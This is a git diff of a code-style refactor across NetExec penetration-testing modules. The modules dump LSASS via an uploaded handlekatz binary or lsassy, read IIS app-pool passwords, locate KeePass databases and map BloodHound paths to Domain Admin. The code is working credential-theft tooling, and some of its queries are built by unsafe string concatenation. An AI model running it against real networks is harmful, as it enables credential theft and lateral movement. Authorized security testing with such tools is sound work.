def on_login(self, context, connection):
|
def on_login(self, context, connection):
|
||||||
"""Concurrent. Required if on_admin_login is not present. This gets called on each authenticated connection"""
|
"""Concurrent. Required if on_admin_login is not present. This gets called on each authenticated connection"""
|
||||||
# Building the search filter
|
# Building the search filter
|
||||||
searchFilter = "(&(objectClass=user)(sAMAccountName={}))".format(self.user)
|
searchFilter = f"(&(objectClass=user)(sAMAccountName={self.user}))"
|
||||||
|
|
||||||
try:
|
try:
|
||||||
context.log.debug("Search Filter=%s" % searchFilter)
|
context.log.debug(f"Search Filter={searchFilter}")
|
||||||
resp = connection.ldapConnection.search(
|
resp = connection.ldapConnection.search(
|
||||||
searchFilter=searchFilter,
|
searchFilter=searchFilter,
|
||||||
attributes=["memberOf", "primaryGroupID"],
|
attributes=["memberOf", "primaryGroupID"],
|
||||||
|
@ -53,7 +48,6 @@ class NXCModule:
|
||||||
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
|
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
|
||||||
# paged queries
|
# paged queries
|
||||||
resp = e.getAnswers()
|
resp = e.getAnswers()
|
||||||
pass
|
|
||||||
else:
|
else:
|
||||||
context.log.debug(e)
|
context.log.debug(e)
|
||||||
return False
|
return False
|
||||||
|
@ -61,7 +55,7 @@ class NXCModule:
|
||||||
memberOf = []
|
memberOf = []
|
||||||
primaryGroupID = ""
|
primaryGroupID = ""
|
||||||
|
|
||||||
context.log.debug("Total of records returned %d" % len(resp))
|
context.log.debug(f"Total of records returned {len(resp)}")
|
||||||
for item in resp:
|
for item in resp:
|
||||||
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
|
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
|
||||||
continue
|
continue
|
||||||
|
@ -75,16 +69,12 @@ class NXCModule:
|
||||||
if str(primaryGroupID) == "513":
|
if str(primaryGroupID) == "513":
|
||||||
memberOf.append("CN=Domain Users,CN=Users,DC=XXXXX,DC=XXX")
|
memberOf.append("CN=Domain Users,CN=Users,DC=XXXXX,DC=XXX")
|
||||||
elif str(attribute["type"]) == "memberOf":
|
elif str(attribute["type"]) == "memberOf":
|
||||||
for group in attribute["vals"]:
|
memberOf += [str(group) for group in attribute["vals"] if isinstance(group._value, bytes)]
|
||||||
if isinstance(group._value, bytes):
|
|
||||||
memberOf.append(str(group))
|
|
||||||
|
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.debug("Exception:", exc_info=True)
|
context.log.debug("Exception:", exc_info=True)
|
||||||
context.log.debug("Skipping item, cannot process due to error %s" % str(e))
|
context.log.debug(f"Skipping item, cannot process due to error {e!s}")
|
||||||
pass
|
|
||||||
if len(memberOf) > 0:
|
if len(memberOf) > 0:
|
||||||
context.log.success("User: {} is member of following groups: ".format(self.user))
|
context.log.success(f"User: {self.user} is member of following groups: ")
|
||||||
for group in memberOf:
|
for group in memberOf:
|
||||||
# Split the string on the "," character to get a list of the group name and parent group names
|
# Split the string on the "," character to get a list of the group name and parent group names
|
||||||
group_parts = group.split(",")
|
group_parts = group.split(",")
|
||||||
|
@ -93,5 +83,4 @@ class NXCModule:
|
||||||
# and splitting it on the "=" character to get a list of the group name and its prefix (e.g., "CN")
|
# and splitting it on the "=" character to get a list of the group name and its prefix (e.g., "CN")
|
||||||
group_name = group_parts[0].split("=")[1]
|
group_name = group_parts[0].split("=")[1]
|
||||||
|
|
||||||
# print("Group name: %s" % group_name)
|
context.log.highlight(f"{group_name}")
|
||||||
context.log.highlight("{}".format(group_name))
|
|
||||||
|
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
# handlekatz module for nxc python3
|
# handlekatz module for nxc python3
|
||||||
# author of the module : github.com/mpgn
|
# author of the module : github.com/mpgn
|
||||||
# HandleKatz: https://github.com/codewhitesec/HandleKatz
|
# HandleKatz: https://github.com/codewhitesec/HandleKatz
|
||||||
|
@ -10,6 +7,7 @@ import re
|
||||||
import sys
|
import sys
|
||||||
|
|
||||||
from nxc.helpers.bloodhound import add_user_bh
|
from nxc.helpers.bloodhound import add_user_bh
|
||||||
|
import pypykatz
|
||||||
|
|
||||||
|
|
||||||
class NXCModule:
|
class NXCModule:
|
||||||
|
@ -20,13 +18,12 @@ class NXCModule:
|
||||||
multiple_hosts = True
|
multiple_hosts = True
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
r"""
|
||||||
TMP_DIR Path where process dump should be saved on target system (default: C:\\Windows\\Temp\\)
|
TMP_DIR Path where process dump should be saved on target system (default: C:\\Windows\\Temp\\)
|
||||||
HANDLEKATZ_PATH Path where handlekatz.exe is on your system (default: /tmp/)
|
HANDLEKATZ_PATH Path where handlekatz.exe is on your system (default: /tmp/)
|
||||||
HANDLEKATZ_EXE_NAME Name of the handlekatz executable (default: handlekatz.exe)
|
HANDLEKATZ_EXE_NAME Name of the handlekatz executable (default: handlekatz.exe)
|
||||||
DIR_RESULT Location where the dmp are stored (default: DIR_RESULT = HANDLEKATZ_PATH)
|
DIR_RESULT Location where the dmp are stored (default: DIR_RESULT = HANDLEKATZ_PATH)
|
||||||
"""
|
"""
|
||||||
|
|
||||||
self.tmp_dir = "C:\\Windows\\Temp\\"
|
self.tmp_dir = "C:\\Windows\\Temp\\"
|
||||||
self.share = "C$"
|
self.share = "C$"
|
||||||
self.tmp_share = self.tmp_dir.split(":")[1]
|
self.tmp_share = self.tmp_dir.split(":")[1]
|
||||||
|
@ -52,12 +49,19 @@ class NXCModule:
|
||||||
self.dir_result = module_options["DIR_RESULT"]
|
self.dir_result = module_options["DIR_RESULT"]
|
||||||
|
|
||||||
def on_admin_login(self, context, connection):
|
def on_admin_login(self, context, connection):
|
||||||
|
handlekatz_loc = self.handlekatz_path + self.handlekatz
|
||||||
|
|
||||||
if self.useembeded:
|
if self.useembeded:
|
||||||
with open(self.handlekatz_path + self.handlekatz, "wb") as handlekatz:
|
try:
|
||||||
handlekatz.write(self.handlekatz_embeded)
|
with open(handlekatz_loc, "wb") as handlekatz:
|
||||||
|
handlekatz.write(self.handlekatz_embeded)
|
||||||
|
except FileNotFoundError:
|
||||||
|
context.log.fail(f"Handlekatz file specified '{handlekatz_loc}' does not exist!")
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
context.log.display(f"Copy {self.handlekatz_path + self.handlekatz} to {self.tmp_dir}")
|
context.log.display(f"Copy {self.handlekatz_path + self.handlekatz} to {self.tmp_dir}")
|
||||||
with open(self.handlekatz_path + self.handlekatz, "rb") as handlekatz:
|
|
||||||
|
with open(handlekatz_loc, "rb") as handlekatz:
|
||||||
try:
|
try:
|
||||||
connection.conn.putFile(self.share, self.tmp_share + self.handlekatz, handlekatz.read)
|
connection.conn.putFile(self.share, self.tmp_share + self.handlekatz, handlekatz.read)
|
||||||
context.log.success(f"[OPSEC] Created file {self.handlekatz} on the \\\\{self.share}{self.tmp_share}")
|
context.log.success(f"[OPSEC] Created file {self.handlekatz} on the \\\\{self.share}{self.tmp_share}")
|
||||||
|
@ -73,7 +77,7 @@ class NXCModule:
|
||||||
p = p[0]
|
p = p[0]
|
||||||
|
|
||||||
if not p or p == "None":
|
if not p or p == "None":
|
||||||
context.log.fail(f"Failed to execute command to get LSASS PID")
|
context.log.fail("Failed to execute command to get LSASS PID")
|
||||||
return
|
return
|
||||||
# we get a CSV string back from `tasklist`, so we grab the PID from it
|
# we get a CSV string back from `tasklist`, so we grab the PID from it
|
||||||
pid = p.split(",")[1][1:-1]
|
pid = p.split(",")[1][1:-1]
|
||||||
|
@ -121,17 +125,17 @@ class NXCModule:
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail(f"[OPSEC] Error deleting lsass.dmp file on share {self.share}: {e}")
|
context.log.fail(f"[OPSEC] Error deleting lsass.dmp file on share {self.share}: {e}")
|
||||||
|
|
||||||
h_in = open(self.dir_result + machine_name, "rb")
|
h_in = open(self.dir_result + machine_name, "rb") # noqa: SIM115
|
||||||
h_out = open(self.dir_result + machine_name + ".decode", "wb")
|
h_out = open(self.dir_result + machine_name + ".decode", "wb") # noqa: SIM115
|
||||||
|
|
||||||
bytes_in = bytearray(h_in.read())
|
bytes_in = bytearray(h_in.read())
|
||||||
bytes_in_len = len(bytes_in)
|
bytes_in_len = len(bytes_in)
|
||||||
|
|
||||||
context.log.display(f"Deobfuscating, this might take a while (size: {bytes_in_len} bytes)")
|
context.log.display(f"Deobfuscating, this might take a while (size: {bytes_in_len} bytes)")
|
||||||
|
|
||||||
chunks = [bytes_in[i : i + 1000000] for i in range(0, bytes_in_len, 1000000)]
|
chunks = [bytes_in[i: i + 1000000] for i in range(0, bytes_in_len, 1000000)]
|
||||||
for chunk in chunks:
|
for chunk in chunks:
|
||||||
for i in range(0, len(chunk)):
|
for i in range(len(chunk)):
|
||||||
chunk[i] ^= 0x41
|
chunk[i] ^= 0x41
|
||||||
|
|
||||||
h_out.write(bytes(chunk))
|
h_out.write(bytes(chunk))
|
||||||
|
@ -177,4 +181,4 @@ class NXCModule:
|
||||||
if len(credz_bh) > 0:
|
if len(credz_bh) > 0:
|
||||||
add_user_bh(credz_bh, None, context.log, connection.config)
|
add_user_bh(credz_bh, None, context.log, connection.config)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail("Error opening dump file", str(e))
|
context.log.fail(f"Error opening dump file: {e}")
|
||||||
|
|
|
@ -1,5 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
# Author: Peter Gormington (@hackerm00n on Twitter)
|
# Author: Peter Gormington (@hackerm00n on Twitter)
|
||||||
import logging
|
import logging
|
||||||
from sqlite3 import connect
|
from sqlite3 import connect
|
||||||
|
@ -12,7 +10,6 @@ from lsassy.session import Session
|
||||||
from lsassy.impacketfile import ImpacketFile
|
from lsassy.impacketfile import ImpacketFile
|
||||||
|
|
||||||
credentials_data = []
|
credentials_data = []
|
||||||
admin_results = []
|
|
||||||
found_users = []
|
found_users = []
|
||||||
reported_da = []
|
reported_da = []
|
||||||
|
|
||||||
|
@ -24,9 +21,9 @@ def neo4j_conn(context, connection, driver):
|
||||||
session = driver.session()
|
session = driver.session()
|
||||||
list(session.run("MATCH (g:Group) return g LIMIT 1"))
|
list(session.run("MATCH (g:Group) return g LIMIT 1"))
|
||||||
context.log.display("Connection Successful!")
|
context.log.display("Connection Successful!")
|
||||||
except AuthError as e:
|
except AuthError:
|
||||||
context.log.fail("Invalid credentials")
|
context.log.fail("Invalid credentials")
|
||||||
except ServiceUnavailable as e:
|
except ServiceUnavailable:
|
||||||
context.log.fail("Could not connect to neo4j database")
|
context.log.fail("Could not connect to neo4j database")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail("Error querying domain admins")
|
context.log.fail("Error querying domain admins")
|
||||||
|
@ -37,15 +34,14 @@ def neo4j_conn(context, connection, driver):
|
||||||
|
|
||||||
|
|
||||||
def neo4j_local_admins(context, driver):
|
def neo4j_local_admins(context, driver):
|
||||||
global admin_results
|
|
||||||
try:
|
try:
|
||||||
session = driver.session()
|
session = driver.session()
|
||||||
admins = session.run("MATCH (c:Computer) OPTIONAL MATCH (u1:User)-[:AdminTo]->(c) OPTIONAL MATCH (u2:User)-[:MemberOf*1..]->(:Group)-[:AdminTo]->(c) WITH COLLECT(u1) + COLLECT(u2) AS TempVar,c UNWIND TempVar AS Admins RETURN c.name AS COMPUTER, COUNT(DISTINCT(Admins)) AS ADMIN_COUNT,COLLECT(DISTINCT(Admins.name)) AS USERS ORDER BY ADMIN_COUNT DESC") # This query pulls all PCs and their local admins from Bloodhound. Based on: https://github.com/xenoscr/Useful-BloodHound-Queries/blob/master/List-Queries.md and other similar posts
|
admins = session.run("MATCH (c:Computer) OPTIONAL MATCH (u1:User)-[:AdminTo]->(c) OPTIONAL MATCH (u2:User)-[:MemberOf*1..]->(:Group)-[:AdminTo]->(c) WITH COLLECT(u1) + COLLECT(u2) AS TempVar,c UNWIND TempVar AS Admins RETURN c.name AS COMPUTER, COUNT(DISTINCT(Admins)) AS ADMIN_COUNT,COLLECT(DISTINCT(Admins.name)) AS USERS ORDER BY ADMIN_COUNT DESC") # This query pulls all PCs and their local admins from Bloodhound. Based on: https://github.com/xenoscr/Useful-BloodHound-Queries/blob/master/List-Queries.md and other similar posts
|
||||||
context.log.success("Admins and PCs obtained.")
|
context.log.success("Admins and PCs obtained")
|
||||||
except Exception:
|
except Exception as e:
|
||||||
context.log.fail("Could not pull admins")
|
context.log.fail(f"Could not pull admins: {e}")
|
||||||
exit()
|
return None
|
||||||
admin_results = [record for record in admins.data()]
|
return list(admins.data())
|
||||||
|
|
||||||
|
|
||||||
def create_db(local_admins, dbconnection, cursor):
|
def create_db(local_admins, dbconnection, cursor):
|
||||||
|
@ -69,7 +65,7 @@ def create_db(local_admins, dbconnection, cursor):
|
||||||
if user not in admin_users:
|
if user not in admin_users:
|
||||||
admin_users.append(user)
|
admin_users.append(user)
|
||||||
for user in admin_users:
|
for user in admin_users:
|
||||||
cursor.execute("""INSERT OR IGNORE INTO admin_users(username) VALUES(?)""", [user])
|
cursor.execute("INSERT OR IGNORE INTO admin_users(username) VALUES(?)", [user])
|
||||||
dbconnection.commit()
|
dbconnection.commit()
|
||||||
|
|
||||||
|
|
||||||
|
@ -107,13 +103,13 @@ def process_creds(context, connection, credentials_data, dbconnection, cursor, d
|
||||||
session = driver.session()
|
session = driver.session()
|
||||||
session.run('MATCH (u) WHERE (u.name = "' + username + '") SET u.owned=True RETURN u,u.name,u.owned')
|
session.run('MATCH (u) WHERE (u.name = "' + username + '") SET u.owned=True RETURN u,u.name,u.owned')
|
||||||
path_to_da = session.run("MATCH p=shortestPath((n)-[*1..]->(m)) WHERE n.owned=true AND m.name=~ '.*DOMAIN ADMINS.*' RETURN p")
|
path_to_da = session.run("MATCH p=shortestPath((n)-[*1..]->(m)) WHERE n.owned=true AND m.name=~ '.*DOMAIN ADMINS.*' RETURN p")
|
||||||
paths = [record for record in path_to_da.data()]
|
paths = list(path_to_da.data())
|
||||||
|
|
||||||
for path in paths:
|
for path in paths:
|
||||||
if path:
|
if path:
|
||||||
for key, value in path.items():
|
for value in path.values():
|
||||||
for item in value:
|
for item in value:
|
||||||
if type(item) == dict:
|
if isinstance(item, dict):
|
||||||
if {item["name"]} not in reported_da:
|
if {item["name"]} not in reported_da:
|
||||||
context.log.success(f"You have a valid path to DA as {item['name']}.")
|
context.log.success(f"You have a valid path to DA as {item['name']}.")
|
||||||
reported_da.append({item["name"]})
|
reported_da.append({item["name"]})
|
||||||
|
@ -147,15 +143,17 @@ class NXCModule:
|
||||||
self.reset = None
|
self.reset = None
|
||||||
self.reset_dumped = None
|
self.reset_dumped = None
|
||||||
self.method = None
|
self.method = None
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def save_credentials(context, connection, domain, username, password, lmhash, nthash):
|
def save_credentials(context, connection, domain, username, password, lmhash, nthash):
|
||||||
host_id = context.db.get_computers(connection.host)[0][0]
|
host_id = context.db.get_computers(connection.host)[0][0]
|
||||||
if password is not None:
|
if password is not None:
|
||||||
credential_type = 'plaintext'
|
credential_type = "plaintext"
|
||||||
else:
|
else:
|
||||||
credential_type = 'hash'
|
credential_type = "hash"
|
||||||
password = ':'.join(h for h in [lmhash, nthash] if h is not None)
|
password = ":".join(h for h in [lmhash, nthash] if h is not None)
|
||||||
context.db.add_credential(credential_type, domain, username, password, pillaged_from=host_id)
|
context.db.add_credential(credential_type, domain, username, password, pillaged_from=host_id)
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
"""
|
||||||
METHOD Method to use to dump lsass.exe with lsassy
|
METHOD Method to use to dump lsass.exe with lsassy
|
||||||
|
@ -173,7 +171,7 @@ class NXCModule:
|
||||||
# lsassy also removes all other handlers and overwrites the formatter which is bad (we want ours)
|
# lsassy also removes all other handlers and overwrites the formatter which is bad (we want ours)
|
||||||
# so what we do is define "success" as a logging level, then do nothing with the output
|
# so what we do is define "success" as a logging level, then do nothing with the output
|
||||||
logging.addLevelName(25, "SUCCESS")
|
logging.addLevelName(25, "SUCCESS")
|
||||||
setattr(logging, "success", lambda message, *args: ())
|
logging.success = lambda message, *args: ()
|
||||||
|
|
||||||
host = connection.host
|
host = connection.host
|
||||||
domain_name = connection.domain
|
domain_name = connection.domain
|
||||||
|
@ -198,7 +196,7 @@ class NXCModule:
|
||||||
return False
|
return False
|
||||||
dumper = Dumper(session, timeout=10, time_between_commands=7).load(self.method)
|
dumper = Dumper(session, timeout=10, time_between_commands=7).load(self.method)
|
||||||
if dumper is None:
|
if dumper is None:
|
||||||
context.log.fail("Unable to load dump method '{}'".format(self.method))
|
context.log.fail(f"Unable to load dump method '{self.method}'")
|
||||||
return False
|
return False
|
||||||
file = dumper.dump()
|
file = dumper.dump()
|
||||||
if file is None:
|
if file is None:
|
||||||
|
@ -247,10 +245,10 @@ class NXCModule:
|
||||||
if len(more_to_dump) > 0:
|
if len(more_to_dump) > 0:
|
||||||
context.log.display(f"User {user[0]} has more access to {pc[0]}. Attempting to dump.")
|
context.log.display(f"User {user[0]} has more access to {pc[0]}. Attempting to dump.")
|
||||||
connection.domain = user[0].split("@")[1]
|
connection.domain = user[0].split("@")[1]
|
||||||
setattr(connection, "host", pc[0].split(".")[0])
|
connection.host = pc[0].split(".")[0]
|
||||||
setattr(connection, "username", user[0].split("@")[0])
|
connection.username = user[0].split("@")[0]
|
||||||
setattr(connection, "nthash", user[1])
|
connection.nthash = user[1]
|
||||||
setattr(connection, "nthash", user[1])
|
connection.nthash = user[1]
|
||||||
try:
|
try:
|
||||||
self.run_lsassy(context, connection, cursor)
|
self.run_lsassy(context, connection, cursor)
|
||||||
cursor.execute("UPDATE pc_and_admins SET dumped = 'TRUE' WHERE pc_name LIKE '" + pc[0] + "%'")
|
cursor.execute("UPDATE pc_and_admins SET dumped = 'TRUE' WHERE pc_name LIKE '" + pc[0] + "%'")
|
||||||
|
@ -302,7 +300,7 @@ class NXCModule:
|
||||||
neo4j_db = f"bolt://{neo4j_uri}:{neo4j_port}"
|
neo4j_db = f"bolt://{neo4j_uri}:{neo4j_port}"
|
||||||
driver = GraphDatabase.driver(neo4j_db, auth=basic_auth(neo4j_user, neo4j_pass), encrypted=False)
|
driver = GraphDatabase.driver(neo4j_db, auth=basic_auth(neo4j_user, neo4j_pass), encrypted=False)
|
||||||
neo4j_conn(context, connection, driver)
|
neo4j_conn(context, connection, driver)
|
||||||
neo4j_local_admins(context, driver)
|
admin_results = neo4j_local_admins(context, driver)
|
||||||
create_db(admin_results, dbconnection, cursor)
|
create_db(admin_results, dbconnection, cursor)
|
||||||
initial_run(connection, cursor)
|
initial_run(connection, cursor)
|
||||||
context.log.display("Running lsassy")
|
context.log.display("Running lsassy")
|
||||||
|
|
|
@ -1,16 +1,13 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
class NXCModule:
|
class NXCModule:
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Checks for credentials in IIS Application Pool configuration files using appcmd.exe.
|
Checks for credentials in IIS Application Pool configuration files using appcmd.exe.
|
||||||
|
|
||||||
Module by Brandon Fisher @shad0wcntr0ller
|
Module by Brandon Fisher @shad0wcntr0ller
|
||||||
"""
|
"""
|
||||||
|
|
||||||
name = 'iis'
|
name = "iis"
|
||||||
description = "Checks for credentials in IIS Application Pool configuration files using appcmd.exe"
|
description = "Checks for credentials in IIS Application Pool configuration files using appcmd.exe"
|
||||||
supported_protocols = ['smb']
|
supported_protocols = ["smb"]
|
||||||
opsec_safe = True
|
opsec_safe = True
|
||||||
multiple_hosts = True
|
multiple_hosts = True
|
||||||
|
|
||||||
|
@ -24,29 +21,26 @@ class NXCModule:
|
||||||
self.check_appcmd(context, connection)
|
self.check_appcmd(context, connection)
|
||||||
|
|
||||||
def check_appcmd(self, context, connection):
|
def check_appcmd(self, context, connection):
|
||||||
|
if not hasattr(connection, "has_run"):
|
||||||
if not hasattr(connection, 'has_run'):
|
|
||||||
connection.has_run = False
|
connection.has_run = False
|
||||||
|
|
||||||
|
|
||||||
if connection.has_run:
|
if connection.has_run:
|
||||||
return
|
return
|
||||||
|
|
||||||
connection.has_run = True
|
connection.has_run = True
|
||||||
|
|
||||||
|
|
||||||
try:
|
try:
|
||||||
connection.conn.listPath('C$', '\\Windows\\System32\\inetsrv\\appcmd.exe')
|
connection.conn.listPath("C$", "\\Windows\\System32\\inetsrv\\appcmd.exe")
|
||||||
self.execute_appcmd(context, connection)
|
self.execute_appcmd(context, connection)
|
||||||
except:
|
except Exception as e:
|
||||||
context.log.fail("appcmd.exe not found, this module is not applicable.")
|
context.log.fail(f"appcmd.exe not found, this module is not applicable - {e}")
|
||||||
return
|
return
|
||||||
|
|
||||||
def execute_appcmd(self, context, connection):
|
def execute_appcmd(self, context, connection):
|
||||||
command = f'powershell -c "C:\\windows\\system32\\inetsrv\\appcmd.exe list apppool /@t:*"'
|
command = 'powershell -c "C:\\windows\\system32\\inetsrv\\appcmd.exe list apppool /@t:*"'
|
||||||
context.log.info(f'Checking For Hidden Credentials With Appcmd.exe')
|
context.log.info("Checking For Hidden Credentials With Appcmd.exe")
|
||||||
output = connection.execute(command, True)
|
output = connection.execute(command, True)
|
||||||
|
|
||||||
lines = output.splitlines()
|
lines = output.splitlines()
|
||||||
username = None
|
username = None
|
||||||
password = None
|
password = None
|
||||||
|
@ -55,20 +49,19 @@ class NXCModule:
|
||||||
credentials_set = set()
|
credentials_set = set()
|
||||||
|
|
||||||
for line in lines:
|
for line in lines:
|
||||||
if 'APPPOOL.NAME:' in line:
|
if "APPPOOL.NAME:" in line:
|
||||||
apppool_name = line.split('APPPOOL.NAME:')[1].strip().strip('"')
|
apppool_name = line.split("APPPOOL.NAME:")[1].strip().strip('"')
|
||||||
if "userName:" in line:
|
if "userName:" in line:
|
||||||
username = line.split("userName:")[1].strip().strip('"')
|
username = line.split("userName:")[1].strip().strip('"')
|
||||||
if "password:" in line:
|
if "password:" in line:
|
||||||
password = line.split("password:")[1].strip().strip('"')
|
password = line.split("password:")[1].strip().strip('"')
|
||||||
|
|
||||||
|
if apppool_name and username is not None and password is not None:
|
||||||
if apppool_name and username is not None and password is not None:
|
|
||||||
current_credentials = (apppool_name, username, password)
|
current_credentials = (apppool_name, username, password)
|
||||||
|
|
||||||
if current_credentials not in credentials_set:
|
if current_credentials not in credentials_set:
|
||||||
credentials_set.add(current_credentials)
|
credentials_set.add(current_credentials)
|
||||||
|
|
||||||
if username:
|
if username:
|
||||||
context.log.success(f"Credentials Found for APPPOOL: {apppool_name}")
|
context.log.success(f"Credentials Found for APPPOOL: {apppool_name}")
|
||||||
if password == "":
|
if password == "":
|
||||||
|
@ -76,7 +69,6 @@ class NXCModule:
|
||||||
else:
|
else:
|
||||||
context.log.highlight(f"Username: {username}, Password: {password}")
|
context.log.highlight(f"Username: {username}, Password: {password}")
|
||||||
|
|
||||||
|
|
||||||
username = None
|
username = None
|
||||||
password = None
|
password = None
|
||||||
apppool_name = None
|
apppool_name = None
|
File diff suppressed because one or more lines are too long
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
from impacket.dcerpc.v5 import rrp
|
from impacket.dcerpc.v5 import rrp
|
||||||
from impacket.dcerpc.v5 import scmr
|
from impacket.dcerpc.v5 import scmr
|
||||||
from impacket.examples.secretsdump import RemoteOperations
|
from impacket.examples.secretsdump import RemoteOperations
|
||||||
|
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
# Credit to https://airbus-cyber-security.com/fr/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/
|
# Credit to https://airbus-cyber-security.com/fr/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/
|
||||||
# Airbus CERT
|
# Airbus CERT
|
||||||
# module by @mpgn_x64
|
# module by @mpgn_x64
|
||||||
|
@ -36,7 +33,6 @@ class NXCModule:
|
||||||
|
|
||||||
context.log.debug("[*] Retrieving network interface of " + connection.host)
|
context.log.debug("[*] Retrieving network interface of " + connection.host)
|
||||||
|
|
||||||
# NetworkAddr = bindings[0]['aNetworkAddr']
|
|
||||||
for binding in bindings:
|
for binding in bindings:
|
||||||
NetworkAddr = binding["aNetworkAddr"]
|
NetworkAddr = binding["aNetworkAddr"]
|
||||||
try:
|
try:
|
|
@ -20,7 +20,7 @@ class NXCModule:
|
||||||
self.search_path = "'C:\\Users\\','$env:PROGRAMFILES','env:ProgramFiles(x86)'"
|
self.search_path = "'C:\\Users\\','$env:PROGRAMFILES','env:ProgramFiles(x86)'"
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
r"""
|
||||||
SEARCH_TYPE Specify what to search, between:
|
SEARCH_TYPE Specify what to search, between:
|
||||||
PROCESS Look for running KeePass.exe process only
|
PROCESS Look for running KeePass.exe process only
|
||||||
FILES Look for KeePass-related files (KeePass.config.xml, .kdbx, KeePass.exe) only, may take some time
|
FILES Look for KeePass-related files (KeePass.config.xml, .kdbx, KeePass.exe) only, may take some time
|
||||||
|
@ -29,7 +29,6 @@ class NXCModule:
|
||||||
SEARCH_PATH Comma-separated remote locations where to search for KeePass-related files (you must add single quotes around the paths if they include spaces)
|
SEARCH_PATH Comma-separated remote locations where to search for KeePass-related files (you must add single quotes around the paths if they include spaces)
|
||||||
Default: 'C:\\Users\\','$env:PROGRAMFILES','env:ProgramFiles(x86)'
|
Default: 'C:\\Users\\','$env:PROGRAMFILES','env:ProgramFiles(x86)'
|
||||||
"""
|
"""
|
||||||
|
|
||||||
if "SEARCH_PATH" in module_options:
|
if "SEARCH_PATH" in module_options:
|
||||||
self.search_path = module_options["SEARCH_PATH"]
|
self.search_path = module_options["SEARCH_PATH"]
|
||||||
|
|
||||||
|
@ -49,20 +48,14 @@ class NXCModule:
|
||||||
keepass_process_id = row[0]
|
keepass_process_id = row[0]
|
||||||
keepass_process_username = row[1]
|
keepass_process_username = row[1]
|
||||||
keepass_process_name = row[2]
|
keepass_process_name = row[2]
|
||||||
context.log.highlight(
|
context.log.highlight(f'Found process "{keepass_process_name}" with PID {keepass_process_id} (user {keepass_process_username})')
|
||||||
'Found process "{}" with PID {} (user {})'.format(
|
|
||||||
keepass_process_name,
|
|
||||||
keepass_process_id,
|
|
||||||
keepass_process_username,
|
|
||||||
)
|
|
||||||
)
|
|
||||||
if row_number == 0:
|
if row_number == 0:
|
||||||
context.log.display("No KeePass-related process was found")
|
context.log.display("No KeePass-related process was found")
|
||||||
|
|
||||||
# search for keepass-related files
|
# search for keepass-related files
|
||||||
if self.search_type == "ALL" or self.search_type == "FILES":
|
if self.search_type == "ALL" or self.search_type == "FILES":
|
||||||
search_keepass_files_payload = "Get-ChildItem -Path {} -Recurse -Force -Include ('KeePass.config.xml','KeePass.exe','*.kdbx') -ErrorAction SilentlyContinue | Select FullName -ExpandProperty FullName".format(self.search_path)
|
search_keepass_files_payload = f"Get-ChildItem -Path {self.search_path} -Recurse -Force -Include ('KeePass.config.xml','KeePass.exe','*.kdbx') -ErrorAction SilentlyContinue | Select FullName -ExpandProperty FullName"
|
||||||
search_keepass_files_cmd = 'powershell.exe "{}"'.format(search_keepass_files_payload)
|
search_keepass_files_cmd = f'powershell.exe "{search_keepass_files_payload}"'
|
||||||
search_keepass_files_output = connection.execute(search_keepass_files_cmd, True).split("\r\n")
|
search_keepass_files_output = connection.execute(search_keepass_files_cmd, True).split("\r\n")
|
||||||
found = False
|
found = False
|
||||||
found_xml = False
|
found_xml = False
|
||||||
|
@ -71,7 +64,7 @@ class NXCModule:
|
||||||
if "xml" in file:
|
if "xml" in file:
|
||||||
found_xml = True
|
found_xml = True
|
||||||
found = True
|
found = True
|
||||||
context.log.highlight("Found {}".format(file))
|
context.log.highlight(f"Found {file}")
|
||||||
if not found:
|
if not found:
|
||||||
context.log.display("No KeePass-related file were found")
|
context.log.display("No KeePass-related file were found")
|
||||||
elif not found_xml:
|
elif not found_xml:
|
||||||
|
|
|
@ -46,17 +46,17 @@ class NXCModule:
|
||||||
self.poll_frequency_seconds = 5
|
self.poll_frequency_seconds = 5
|
||||||
self.dummy_service_name = "OneDrive Sync KeePass"
|
self.dummy_service_name = "OneDrive Sync KeePass"
|
||||||
|
|
||||||
with open(get_ps_script("keepass_trigger_module/RemoveKeePassTrigger.ps1"), "r") as remove_trigger_script_file:
|
with open(get_ps_script("keepass_trigger_module/RemoveKeePassTrigger.ps1")) as remove_trigger_script_file:
|
||||||
self.remove_trigger_script_str = remove_trigger_script_file.read()
|
self.remove_trigger_script_str = remove_trigger_script_file.read()
|
||||||
|
|
||||||
with open(get_ps_script("keepass_trigger_module/AddKeePassTrigger.ps1"), "r") as add_trigger_script_file:
|
with open(get_ps_script("keepass_trigger_module/AddKeePassTrigger.ps1")) as add_trigger_script_file:
|
||||||
self.add_trigger_script_str = add_trigger_script_file.read()
|
self.add_trigger_script_str = add_trigger_script_file.read()
|
||||||
|
|
||||||
with open(get_ps_script("keepass_trigger_module/RestartKeePass.ps1"), "r") as restart_keepass_script_file:
|
with open(get_ps_script("keepass_trigger_module/RestartKeePass.ps1")) as restart_keepass_script_file:
|
||||||
self.restart_keepass_script_str = restart_keepass_script_file.read()
|
self.restart_keepass_script_str = restart_keepass_script_file.read()
|
||||||
|
|
||||||
